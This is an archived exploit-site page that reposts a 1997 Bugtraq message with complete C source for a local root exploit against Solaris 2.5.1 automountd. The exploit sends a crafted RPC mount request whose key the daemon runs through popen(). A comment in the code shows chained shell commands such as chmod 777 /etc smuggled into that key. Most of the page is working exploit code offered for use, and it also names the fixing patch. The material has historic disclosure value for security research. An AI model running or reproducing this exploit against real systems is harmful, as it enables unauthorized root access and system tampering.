Solaris 2.5.1 automound hole

Summary
Description:standard popen() hole
Author:Anonymous
Compromise: root (local)
Vulnerable Systems:Solaris 2.5.1 without patch 10465[45] applie
Date:26 November 1997
Details


Date: Wed, 26 Nov 1997 02:02:13 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Solaris 2.5.1 automountd exploit (fwd)

>From anonymous:
--

/*
 this is really dumb automountd exploit, tested on solaris 2.5.1
 ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
 map is executed via popen with key given as argument, read automount(1M)

 patch 10465[45] fixes this

 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

#define AUTOTS "datagram_v" /* XXX */

void usage(char *s) {
  printf("Usage: %s mountpoint map key [opts]\n", s);
  exit(0);
}

bool_t
xdr_mntrequest(xdrs, objp)
        register XDR *xdrs;
        mntrequest *objp;
{

        register long *buf;

        if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
                return (FALSE);
        return (TRUE);
}

bool_t
xdr_mntres(xdrs, objp)
        register XDR *xdrs;
        mntres *objp;
{

        register long *buf;

        if (!xdr_int(xdrs, &objp->status))
                return (FALSE);
        return (TRUE);
}

main(int argc, char *argv[]) {
  char hostname[MAXHOSTNAMELEN];
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct mntrequest req;
  struct mntres result;

  if (argc < 4)
    usage(argv[0]);

  req.path=argv[1];
  req.map=argv[2];
  req.name=argv[3];
  req.opts=argv[4];
  if (gethostname(hostname, sizeof(hostname)) == -1) {
    perror("gethostname");
    exit(0);
  }
  if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  tm.tv_sec=5;
  tm.tv_usec=0;
  stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
                (char *)&result, tm);
  if (stat != RPC_SUCCESS)
    clnt_perror(cl, "mount call");
  else
    printf("mntres = %d.\n", result.status);
  clnt_destroy(cl);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]